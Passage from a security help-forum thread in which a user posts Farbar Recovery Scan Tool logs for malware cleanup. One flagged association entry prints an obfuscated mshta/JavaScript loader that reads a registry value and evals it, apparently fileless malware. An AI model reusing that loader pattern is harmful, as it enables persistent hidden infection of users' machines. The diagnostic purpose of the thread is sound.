ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {a9609e5e-3e81-11e6-b392-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {aba9da97-2c6f-11e5-9b7e-99b7c27ee180}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {b9ae0dde-ffcc-11e4-9646-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {ba3a276d-ad0c-11e6-b3ba-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {bd8e81a9-5115-11e6-b299-cac8d5d6ee70}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {bdae5240-d33f-11e4-b541-bf24e1a268f6}
description             Windows Recovery
ramdisksdidevice        partition=\Device\HarddiskVolume3
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {c0563399-74d7-11e4-ab1c-9cb198ec84d4}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {ca4e4464-2050-11e6-848b-b0cf0c155543}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {d24bf5bf-d322-11e4-9617-386077a7a31a}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {d27a4702-fde7-11e5-b382-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {d67b8984-9faa-11e5-b370-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {eed8252b-1c62-11e5-9523-b09403b1f74a}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {eed8252c-1c62-11e5-9523-b09403b1f74a}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {f176c1fd-4ed8-11e6-b394-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {f2be3dd2-a817-11e4-9600-386077a7a31a}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {f69b7c33-f1c1-11e4-9635-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {fa4c8e4d-778e-11e5-bd80-df3b4abbd218}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {fd532406-7772-11e5-b365-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi


LastRegBack: 2017-01-18 11:49

==================== End of FRST.txt ============================

Offline Ozzie

  • Full Member
  • ***
  • Posts: 55
    • View Profile
Re: File Type Question
« Reply #35 on: January 25, 2017, 09:01:25 PM »
I apologize for it being so long.

Offline Corrine

  • The Mystical Rose
  • Administrator
  • Hero Member
  • *****
  • Posts: 19425
  • "Stronger than the past, united in our goal."
    • View Profile
    • Security Garden
Re: File Type Question
« Reply #36 on: January 25, 2017, 10:56:54 PM »
It seems you checked each box instead of leaving the default setting.  :) 

How about the Addition.txt log?


Take a walk through the "Security Garden" -- Where Everything is Coming up Roses!

Remember - A day without laughter is a day wasted.
May the wind sing to you and the sun rise in your heart.

Offline Ozzie

  • Full Member
  • ***
  • Posts: 55
    • View Profile
Re: File Type Question
« Reply #37 on: January 26, 2017, 03:05:33 PM »
Here is the Addition.txt log.

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 22-01-2017
Ran by nepta (24-01-2017 14:28:00)
Running from C:\Users\nepta\Downloads
Windows 10 Pro Insider Preview Version 1607 (X64) (2016-12-22 01:52:39)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3155403222-1004678540-3907824167-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3155403222-1004678540-3907824167-503 - Limited - Disabled)
Guest (S-1-5-21-3155403222-1004678540-3907824167-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3155403222-1004678540-3907824167-1005 - Limited - Enabled)
nepta (S-1-5-21-3155403222-1004678540-3907824167-1001 - Administrator - Enabled) => C:\Users\nepta

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

ABBYY FineReader 9.0 Sprint (HKLM-x32\...\ABBYY FineReader 9.0 Sprint) (Version: 9.01.513.58212 - ABBYY)
ABBYY FineReader 9.0 Sprint (x32 Version: 9.01.513.58212 - ABBYY) Hidden
Adblock Plus for IE (32-bit and 64-bit) (HKLM\...\{0F347A49-E36C-4639-8D2E-003AD408B8B2}) (Version: 1.5 - Eyeo GmbH)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.023.20056 - Adobe Systems Incorporated)
Apple Application Support (32-bit) (HKLM-x32\...\{D079CAAD-0C31-47A2-9AF5-A82F9CD9B221}) (Version: 5.2 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{64E6007B-1DA9-42CD-BBE4-D5FA67A7C71D}) (Version: 5.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{55BB2110-FB43-49B3-93F4-945A0CFB0A6C}) (Version: 10.0.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.26 - Piriform)
EPSON WorkForce 645 Series Printer Uninstall (HKLM\...\EPSON WorkForce 645 Series) (Version:  - SEIKO EPSON Corporation)
Fitbit Connect (HKLM-x32\...\{6EB73D9D-645E-415B-8008-83C3CB865968}) (Version: 2.0.1.6742 - Fitbit Inc.)
GIMP 2.8.16 (HKLM\...\GIMP-2_is1) (Version: 2.8.16 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 55.0.2883.87 - Google Inc.)
Google Earth (HKLM-x32\...\{A0C18B96-AB79-46BD-8321-6FA83E6D25B9}) (Version: 7.1.7.2606 - Google)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
HP Officejet Pro 8610 Basic Device Software (HKLM\...\{39DA3F40-0B9E-4002-8E01-108FEC9EFE43}) (Version: 32.3.198.49673 - Hewlett-Packard Co.)
HP Officejet Pro 8610 Help (HKLM-x32\...\{F9569D00-4576-46C8-B6C7-207A4FD39745}) (Version: 32.0.0 - Hewlett Packard)
HP Support Solutions Framework (HKLM-x32\...\{F6A11738-3EE4-4573-AEA5-6CD5D491C167}) (Version: 12.5.32.203 - Hewlett-Packard Company)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
iCloud (HKLM\...\{4BB313CE-D3D1-424C-8823-15CF85B00B05}) (Version: 6.1.0.30 - Apple Inc.)
IrfanView 64 (remove only) (HKLM\...\IrfanView64) (Version: 4.42 - Irfan Skiljan)
iTunes (HKLM\...\{81C96689-EA5B-4B7D-A04F-16326EC51BC2}) (Version: 12.5.4.42 - Apple Inc.)
KeePass Password Safe 2.35 (HKLM-x32\...\KeePassPasswordSafe2_is1) (Version: 2.35 - Dominik Reichl)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Money Plus (HKLM-x32\...\Money2008b) (Version: 17 - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISER) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\OneDriveSetup.exe) (Version: 17.3.6720.1207 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
NVIDIA 3D Vision Controller Driver 352.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 352.65 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 369.09 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 369.09 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.5.15.54 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.5.15.54 - NVIDIA Corporation)
NVIDIA Graphics Driver 369.09 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 369.09 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.34.15 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.15 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9.141.259 - Google, Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.53 - Piriform)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
SHIELD Streaming (Version: 4.1.500 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.5.15.54 - NVIDIA Corporation) Hidden
Software Update Wizard (Redistributable) 4.5 (HKLM-x32\...\Software Update Wizard (Redistributable)) (Version: 4.5 - PowerProgrammer)
Speccy (HKLM\...\Speccy) (Version: 1.30 - Piriform)
SplashShopper Desktop 3.1.0 (HKLM-x32\...\SplashShopper Desktop) (Version: 3.1.0 - SplashData)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Vulkan Run Time Libraries 1.0.11.1 (HKLM\...\VulkanRT1.0.11.1) (Version: 1.0.11.1 - LunarG, Inc.)
Xmarks for IE (HKLM-x32\...\{ABFA6EAE-C9C0-4B39-B722-02094EF6B889}) (Version: 127.0.177 - Xmarks)
YNAB 4 version 4.3.857 (HKLM-x32\...\com.ynab.YNAB4.LiveCaptive_is1) (Version: 4.3.857 - YouNeedABudget.com)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {04771B00-E472-4CA7-B478-E2DCAD3DDFE7} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.)
Task: {0BE0FB80-2013-4937-8462-C3EF4E350231} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-01-13] (Google Inc.)
Task: {18A4D7EE-CCD8-4D33-9904-9064CF8A5DD9} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {2F431CA5-1A07-4DBF-B9FB-E13EB2E94F84} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceProtectionStateChanged
Task: {439B6DE1-58F7-48A1-AD8B-5B1EBC6CD269} - \Microsoft\XblGameSave\XblGameSaveTask\Logon -> No File <==== ATTENTION
Task: {5690CAE8-4FA1-42A9-9538-B06E4673EB24} - System32\Tasks\Microsoft\Windows\SysResetDelayedCleanup => Rundll32.exe ResetEng.dll,RjvDelayedCleanupEntryPoint
Task: {7597ADD9-C074-4C1E-A4A0-2650C0686697} - System32\Tasks\Microsoft\Windows\Subscription\EnableLicenseAcquisition => C:\WINDOWS\system32\ClipRenew.exe [2016-12-03] (Microsoft Corporation)
Task: {783E8AC2-3F32-4DE5-9F06-C062E4762819} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-12-21] (HP Inc.)
Task: {7BFC09BB-DC63-4BD5-8011-5D65B94B3F11} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
Task: {A32A7355-CF98-41E0-B886-B6B74534B3CB} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-01-13] (Google Inc.)
Task: {AC707944-592E-444D-86B0-D4A4019DCA71} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-12-21] (Piriform Ltd)
Task: {E326602E-A55A-4DB3-8428-67A57CF0EB7C} - System32\Tasks\Microsoft\Windows\Subscription\LicenseAcquisition => C:\WINDOWS\system32\ClipRenew.exe [2016-12-03] (Microsoft Corporation)
Task: {E9073F07-64D7-4A00-A6AA-B1FDAEE0FF88} - System32\Tasks\{2746715E-41F5-45F6-87C8-F6AD1333CC64} => pcalua.exe -a "C:\Program Files (x86)\Wondershare\MobileGo\unins000.exe" -c /WAF
Task: {EF82857E-6B76-45B1-9FE1-AD22C9553C59} - System32\Tasks\GoogleUpdateTaskMachineCore1d1b446eafdf7a7 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-01-13] (Google Inc.)
Task: {F19CEB9F-AAB9-459F-9C7B-29DD4EF0617A} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
Task: {F80142CF-167E-4F3D-BF86-F9531AD8E1B7} - System32\Tasks\Microsoft\Windows\BrokerInfrastructure\BgTaskRegistrationMaintenanceTask
Task: {FC0D430B-2A86-4FC5-988C-29544DBCE340} - System32\Tasks\{3B8F5E62-39B9-47BB-8AE7-DEB6E12BD22B} => pcalua.exe -a C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YINSHVA.EXE -c /R /APD /P:"EPSON WorkForce 645 Series"

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\nepta\AppData\Local\685b23\0a1e0a.lnk -> C:\Users\nepta\AppData\Local\685b23\ee2b2d.bat (No File)

==================== Loaded Modules (Whitelisted) ==============

2016-12-03 08:34 - 2016-12-03 08:34 - 03142840 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00347136 _____ () C:\Windows\System32\HrtfApo.dll
2016-09-01 17:12 - 2016-09-01 17:12 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-11-17 01:28 - 2016-11-17 01:28 - 01353528 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 03142840 _____ () c:\windows\system32\CoreUIComponents.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 03142840 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-12-21 19:58 - 2016-12-21 19:58 - 01678560 _____ () C:\Users\nepta\AppData\Local\Microsoft\OneDrive\17.3.6720.1207\amd64\ClientTelemetry.dll
2017-01-18 09:08 - 2017-01-18 09:08 - 00072192 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.10.152.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-01-18 09:08 - 2017-01-18 09:08 - 00179712 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.10.152.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00148752 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00186368 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2016-12-03 08:35 - 2016-12-03 08:35 - 00816640 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2016-12-03 08:35 - 2016-12-03 10:01 - 10812416 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-12-03 08:35 - 2016-12-03 10:01 - 02004480 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-12-03 08:35 - 2016-12-03 10:01 - 01100800 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2016-12-03 08:35 - 2016-12-03 10:01 - 05280256 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 03142840 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-12-21 19:30 - 2016-08-01 06:54 - 00133056 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2017-01-21 08:52 - 2017-01-21 08:52 - 03865600 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1701.10102.0_x64__8wekyb3d8bbwe\Calculator.exe
2016-12-13 10:36 - 2016-12-13 10:36 - 00017408 _____ () C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.37.0_x86__8wekyb3d8bbwe\Microsoft.Msn.Weather.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 03142840 _____ () C:\Windows\System32\CoreUIComponents.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00410896 _____ () C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy\CHXSmartScreen.exe
2016-11-17 01:29 - 2016-11-17 01:29 - 01041720 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2016-09-01 17:13 - 2016-09-01 17:13 - 00080184 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2016-11-17 01:28 - 2016-11-17 01:28 - 00189752 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll
2009-02-26 12:46 - 2009-02-26 12:46 - 00064344 _____ () C:\Program Files (x86)\Microsoft Office\Office12\ADDINS\ColleagueImport.dll
2011-06-22 10:46 - 2011-06-22 10:46 - 00434016 _____ () C:\Program Files (x86)\Microsoft Office\Office12\ADDINS\UmOutlookAddin.dll
2015-11-11 03:41 - 2015-11-11 03:41 - 00756376 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE12\MSPTLS.DLL
2016-12-09 15:44 - 2016-12-08 01:29 - 01829208 _____ () C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\libglesv2.dll
2016-12-09 15:44 - 2016-12-08 01:29 - 00085848 _____ () C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\libegl.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf
2016-12-13 10:36 - 2016-12-13 10:36 - 12163072 _____ () C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.37.0_x86__8wekyb3d8bbwe\Microsoft.Msn.Weather.dll
2016-12-13 10:36 - 2016-12-13 10:36 - 00958464 _____ () C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.37.0_x86__8wekyb3d8bbwe\SQLite3Wrapper.dll
2016-05-07 07:09 - 2016-05-07 07:09 - 00645120 _____ () C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.37.0_x86__8wekyb3d8bbwe\Microsoft.Aria.ClientTelemetry.dll
2016-08-20 10:17 - 2016-08-20 10:17 - 03312024 _____ () C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.37.0_x86__8wekyb3d8bbwe\Microsoft.Advertising.dll
2015-11-04 12:40 - 2015-10-11 21:05 - 00013088 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:5C321E34 [125]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\Software\Classes\05592: "C:\WINDOWS\system32\mshta.exe" "javascript:qQDHE1RB8="Mzhx5ZR";Ba8=new ActiveXObject("WScript.Shell");HCenQii8="bzZ";q4GcW=Ba8.RegRead("HKCU\\software\\lcepqwksl\\apojauvq");lEkDKq6="LjAo";eval(q4GcW);F55NPtu="ix";" <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE restricted site: HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\008k.com -> 008k.com
IE restricted site: HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\00hq.com -> 00hq.com
IE restricted site: HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\0190-dialers.com -> 0190-dialers.com
IE restricted site: HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\01i.info -> 01i.info
IE restricted site: HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\02pmnzy5eo29bfk4.com -> 02pmnzy5eo29bfk4.com
IE restricted site: HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\0411dd.com -> 0411dd.com
IE restricted site: HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\0511zfhl.com -> 0511zfhl.com
IE restricted site: HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\05p.com -> 05p.com
IE restricted site: HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\0632qyw.com -> 0632qyw.com
IE restricted site: HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\07ic5do2myz3vzpk.com -> 07ic5do2myz3vzpk.com
IE restricted site: HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\08nigbmwk43i01y6.com -> 08nigbmwk43i01y6.com
IE restricted site: HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\093qpeuqpmz6ebfa.com -> 093qpeuqpmz6ebfa.com
IE restricted site: HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\0calories.net -> 0calories.net
IE restricted site: HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\0cj.net -> 0cj.net
IE restricted site: HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\0scan.com -> 0scan.com
IE restricted site: HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\1-britney-spears-nude.com -> 1-britney-spears-nude.com
IE restricted site: HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\1-domains-registrations.com -> 1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\1-se.com -> 1-se.com
IE restricted site: HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\1001movie.com -> 1001movie.com

There are 6091 more sites.


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-10-19 16:09 - 2015-10-19 16:07 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\Control Panel\Desktop\\Wallpaper -> c:\users\nepta\pictures\wallpaper\12122952_1169510753063347_5170063591229541779_n.png
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

HKLM\...\StartupApproved\Run: => "ShadowPlay"
HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\StartupApproved\Run: => "CCleaner Monitoring"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => LPort=139
FirewallRules: [holoshellapp-In-TCP] => %systemroot%\holoshell\holoshellapp.exe
FirewallRules: [holoshellapp-Out-TCP] => %systemroot%\holoshell\holoshellapp.exe
FirewallRules: [compositor-In-TCP] => LPort=48862
FirewallRules: [compositor-Out-TCP] => LPort=48862
FirewallRules: [{38749D41-9B19-423A-8772-CF4A598E41CC}] => C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{BF921DD7-EDF3-4D31-93C6-31A21DB129FF}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{C0409259-95BE-489A-96E7-3FC59394A6E5}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{2AFAB629-77CC-45E7-9A7F-8722C449D2BE}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{000DEFFA-6821-4F9B-ACDD-AF56E8C2E22E}] => C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{4008ED15-426B-4E27-8FF2-A6638805D27F}] => C:\Program Files\Bonjour\mDNSResponder.exe
